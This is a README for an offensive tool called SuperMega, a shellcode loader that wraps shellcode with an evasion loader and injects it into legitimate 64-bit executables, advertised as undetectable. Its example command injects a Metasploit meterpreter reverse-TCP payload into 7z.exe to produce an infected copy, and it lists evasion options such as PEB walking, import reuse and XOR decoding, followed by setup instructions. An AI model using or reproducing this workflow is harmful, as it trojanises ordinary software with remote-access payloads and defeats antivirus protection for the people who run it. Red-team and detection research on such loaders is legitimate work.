# SuperMega - Cordyceps Implementation > Ophiocordyceps camponoti-balzani is a species of fungus that parasitizes > insect hosts of the order Hymenoptera, primarily ants. O. > camponoti-balzani infects ants, and eventually kills the hosts after > they move to an ideal location for the fungus to spread its spores. ## What SuperMega is a shellcode loader. It will take a shellcode as input, protects it, adds a loader, and injects the resulting shellcode into an exe. FUD. And: * Only works with 64 bit (shellcode and infecteble exe's) Features: * Loader source is C yay * Execution-Guardrails * Environment variables * configurable implementation * different EXE injection techniques Plugins: * source style: * PEB_WALK * IAT_REUSE * alloc style: * RWX * REUSE_RWX * decoder style: * PLAIN_1 * XOR_1 * dataref style: * APPEND ## Examples ### Metasploit in 7z Inject metasploit into 7z.exe. It will use PEB_WALK. ``` PS C:\repos\supermega> python.exe .\supermega.py --shellcode .\shellcodes\msf-meterpreter-reversetcp.bin --inject .\exes\7z.exe (supermega.py) Super Mega (helper.py ) --[ Remove old files ] (model.py ) --( Capabilities: (model.py ) 0x0: GetEnvironmentVariableW (b'') (model.py ) 0x460090: VirtualAlloc (b'') (supermega.py) --[ SourceStyle: peb_walk (compiler.py ) --[ C to ASM: build\main.c -> build\main.asm ] (compiler.py ) ---[ Make ASM from C: build\main.c ] (compiler.py ) ---[ Fixup : build\main.asm ] (compiler.py ) > Replace external reference at line: 8 (compiler.py ) > Replace external reference at line: 395 (compiler.py ) > Replace payload length at line: 389 (compiler.py ) > Add end of code label at line: 807 (compiler.py ) ---[ Cleanup: build\main.asm ] (assembler.py) --[ Assemble to exe: build\main.asm -> build\main.exe -> build\main.bin ] (assembler.py) ---[ Assemble ASM to EXE: build\main.asm -> build\main.exe ] (assembler.py) ---[ EXE to SHC: build\main.exe -> build\main.bin ] (helper.py ) --[ Code section: .text (helper.py ) > 0x1000 Code Size: 2557 (raw code section size: 2560) (assembler.py) --[ Merge stager: build\main.bin + .\shellcodes\msf-meterpreter-reversetcp.bin -> build\main.bin ] (assembler.py) ---[ Size: Stager: 2557 and Payload: 449 Sum: 3006 ] (injector.py ) --[ Injecting: build\main.bin into: .\exes\7z.exe -> .\exes\7z.infected.exe ] (supermega.py) --[ Start infected exe ] ``` ## Directories * `shellcodes/`: Input: Shellcodes we want to use as input (payload) * `source/`: Input: Loader C templates * `plugins/`: Input: Loader C implementations * `exes/`: Input: Nonmalicious EXE files we inject into * `build/`: build: Temporary files during build process * `logs/`: build: Files generated by building (inspect for debugging) * `out/`: output. The generated result: infected exe ## Installation ### Paths Configure `config.yaml` with: * Path to Visual Studio 2022 compiler and assembler * Path to mash_shc and runshc: https://github.com/hasherezade/masm_shc. `config.yaml`: ```yaml path_cl: 'C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\bin\Hostx64\x64\cl.exe' path_ml64: 'C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\bin\Hostx64\x64\ml64.exe' path_masmshc: 'C:\Users\hacker\Source\Repos\masm_shc\out\build\x64-Debug\masm_shc\masm_shc.exe' path_runshc: 'C:\Users\hacker\Source\Repos\masm_shc\out\build\x64-Debug\runshc\runshc.exe' ``` Make sure its the `Hostx64/x64/` one exe. Make sure to compile msmshc and runshc as 64bit. You can also replace runshc with your own shellcode loader. ### Environment Variables It needs all the Microsoft Visual Studio specific paths as environment variables. Either start the "visual studio developer console", or if you are sane, use the following commandline to get all the damn env right. Use this when `Cannot find Windows.h`. ``` cmd.exe /c "`"C:\Program Files (x86)\Microsoft Visual Studio\\\Common7\Tools\VsDevCmd.bat`" && powershell" ``` Also make sure radare2 is in path: ``` $Env:PATH += ";C:\Tools\radare2-5.8.8-w64\bin" ``` ### Alternative Use ``` "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\Build\vcvars64.bat" ``` or the VS developer console to find the damn environment variables, and set it in your python console. In my case: ``` $env:INCLUDE = "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\include;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\ATLMFC\include;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\VS\include;C:\Program Files (x86)\Windows Kits\10\include\10.0.22621.0\ucrt;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\um;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\shared;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\winrt;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\cppwinrt;C:\Program Files (x86)\Windows Kits\NETFXSDK\4.8\include\um" $env:LIB="C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\ATLMFC\lib\x64;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\lib\x64;C:\Program Files (x86)\Windows Kits\NETFXSDK\4.8\lib\um\x64;C:\Program Files (x86)\Windows Kits\10\lib\10.0.22621.0\ucrt\x64;C:\Program Files (x86)\Windows Kits\10\\lib\10.0.22621.0\\um\x64" $env:LIBPATH="C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\ATLMFC\lib\x64;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\lib\x64;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\lib\x86\store\references;C:\Program Files (x86)\Windows Kits\10\UnionMetadata\10.0.22621.0;C:\Program Files (x86)\Windows Kits\10\References\10.0.22621.0;C:\Windows\Microsoft.NET\Framework64\v4.0.30319" ``` ### VS2022 Components A list of packages/components which may be required for Visual Studio 2022: * C++ 2022 Redistributable Update * C++ Build Insights * C++ CMake tools for windows * C++ /CLI support for v143 build tools (lastest) * MSBuild * MSVC v133 - VS 2002 C++ x64/x86 build tools (latest) * C++ ATL for latest v143 build tools (x86 & x64) * C++ MFC for latest v143 build tools (x86 & x64) * Windows 11 SDK